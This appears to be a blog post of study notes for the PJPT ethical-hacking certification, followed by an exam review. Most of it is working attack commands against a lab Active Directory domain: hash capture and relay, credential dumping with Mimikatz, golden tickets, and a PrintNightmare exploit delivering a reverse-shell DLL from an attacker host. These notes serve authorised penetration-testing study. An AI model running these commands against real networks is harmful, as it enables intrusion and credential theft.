PJPT Certification Notes
Overview
The PJPT certification is offered by TCM Security and comes with the Practical Ethical Hacking course. The course covers various topics from Active Directory to CVE exploitation through videos and quizzes.
Network Enumeration
Basic Network Scanning
# ARP scanning
sudo arp-scan -l
# Network discovery
netdiscover -r 192.168.5.0/24
# Comprehensive Nmap scans
nmap -T4 -p- -A 192.168.5.0/24
nmap -T4 -p- -A 192.168.5.1
nmap -T4 -p- -sS -sC 192.168.5.0/24Active Directory Attacks
LLMNR Poisoning
- Capture NTLMv2 hashes using Responder:
sudo responder -I tun0 -dP- Crack captured hashes:
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txtSMB Relay Attack
Prerequisites: SMB signing must be disabled on target machines.
- Check SMB signing status:
nmap -p445 192.168.5.0/24 --script=smb2-security-mode- Configure Responder:
sudo nano /etc/responder/Responder.conf
# Set:
# SMB = Off
# HTTP = Off- Execute relay attack:
# For hash dumping
sudo ntlmrelayx.py -tf targets.txt -smb2support
# For interactive shell
sudo ntlmrelayx.py -tf targets.txt -smb2support -i
# For command execution
sudo ntlmrelayx.py -tf targets.txt -smb2support -c "whoami"Shell Access Methods
PSExec
# Domain user
psexec.py test.local/fcastle:'Password1'@192.168.5.1
# Local user
psexec.py fcastle:'Password1'@192.168.5.1
# Pass-the-hash
psexec.py Administrator@192.168.5.1 --hashes [LM-hash]:[NTLM-hash]WMIExec
wmiexec.py Administrator@192.168.5.1 --hashes [LM-hash]:[NTLM-hash]SMBExec
smbexec.py test.local/fcastle:'Password1'@192.168.5.1Metasploit PSExec
use exploit/windows/smb/psexec
set SMBDomain test.local
set SMBUser fcastle
set SMBPass Password1
set RHOSTS 192.168.5.2IPv6 Attacks
When IPv6 is enabled without proper DNS configuration:
- Start mitm6:
sudo mitm6 -d test.local- Configure NTLM relay:
ntlmrelayx.py -6 -t ldaps://192.168.5.1 -wh fakewpad.test.local -l lootmeResults will be saved in /home/kali/lootme/domain_computers.html
Post-Compromise Enumeration
LDAP Domain Dump
sudo ldapdomaindump ldaps://192.168.5.1 -u 'test.local\fcastle' -p Password1
firefox domain_*.htmlBloodHound
- Collect data:
sudo bloodhound-python -d test.local -u fcastle -p Password1 -ns 192.168.5.1 -c all- Start services:
sudo neo4j console
sudo bloodhoundPlumHound
sudo python3 PlumHound.py --easy -p [PASSWORD]
sudo python3 PlumHound.py -x tasks/default.tasks -p [PASSWORD]Post-Compromise Attacks
Pass-the-Hash
- Test credentials:
# With password
crackmapexec smb 192.168.5.0/24 -d test.local -u fcastle -p Password1
# With hash
crackmapexec smb 192.168.5.0/24 -d test.local -u administrator -H [HASH]- Dump hashes:
# Using Secretsdump
secretsdump.py test.local\fcastle:Password1@192.168.5.2
# Using hash
secretsdump.py administrator@192.168.5.3 --hashes [LM-HASH]:[NT-HASH]Kerberoasting
- Request SPN tickets:
python GetUserSPNs.py test.local/fcastle:Password1 -dc-ip 192.168.5.1 -request- Crack tickets:
hashcat -m 13100 SPNs-hash.txt /usr/share/wordlists/rockyou.txtToken Impersonation
meterpreter > list_tokens -u
meterpreter > impersonate_token test\\administratorCredential Dumping
Mimikatz
mimikatz(powershell) # privilege::debug
mimikatz(powershell) # lsadump::lsa /patch
mimikatz(powershell) # sekurlsa::logonPasswordsProcDump
procdump.exe -accepteula -ma lsass.exe out.dmpDomain Privilege Escalation
# Create domain user
net user /add pentester "StrongPassword123!" /domain
# Add to Domain Admins
net group "Domain Admins" pentester /ADD /DOMAINAdvanced Attacks
ZeroLogon
Warning: Can cause severe domain controller damage
Test for vulnerability:
git clone https://github.com/SecuraBV/CVE-2020-1472.git
cd CVE-2020-1472
python3 zerologon_tester.py DC-01 192.168.5.1PrintNightmare
Remote Code Execution
- Check vulnerability:
rpcdump.py @192.168.5.3 | egrep 'MS-RPRN|MS-PAR'- Execute attack:
# Create payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ATTACKER-IP> LPORT=5555 -f dll > shell.dll
# Share payload
smbserver.py share . -smb2support
# Execute exploit
python3 CVE-2021-1675.py test.local/f.castle:Password1@192.168.5.2 '\\<ATTACKER-IP>\share\shell.dll'Local Privilege Escalation
Import-Module .\cve-2021-1675.ps1
Invoke-Nightmare -DriverName "Xerox" -NewUser "pentester" -NewPassword "StrongPassword123!"Domain Takeover Techniques
NTDS.dit Extraction
secretsdump.py test.local\fcastle:Password1@192.168.5.2 -just-dc-ntlmGolden Ticket Attack
# In Mimikatz:
privilege::debug
lsadump::lsa /inject /name:krbtgt
kerberos::golden /User:Administrator /domain:test.local /sid:S-1-5-21-3311685201-1443070845-3622335404 /krbtgt:3f5f8614cf590401df166f81b87bf17 /id:500 /ptt
misc::cmdMy honest review
I have completed the PJPT certification and I must say that it was a great experience. For 200€, I couldn’t ask for more. It provide what it promised, a practical approach to ethical hacking.
Successfully compromised the Active Directory domain within 5 hours was such a great feeling. The system was stable and the labs were well-prepared.
But if possible, I would like to have more pivoting and lateral movement in the exam. It would be great to have more real-world scenarios.
Report writing is painful for me, even though I owned a MOS certification in Word, I still struggle with the report writing. I would prefer to use LaTeX or Markdown for the report. But it is what it is, Word is the standard in the industry.
Tips
- Do not overthink the exam, it is not that hard. I had prior experience in CTFs and pentesting, therefore sometimes I overthink the questions. The exam is straightforward, just follow the instructions and you will be fine.
- Practice all the labs. The labs are the most important part of the course. It is where you will learn the most. Do not skip any of them.
- Take notes, every single one of them. I took notes during the exam and it helped me a lot. I was able to refer back to my notes when I was stuck.
- Do not rush. The exam is 2 days long, you have plenty of time. Rest well to gain energy and focus on the exam.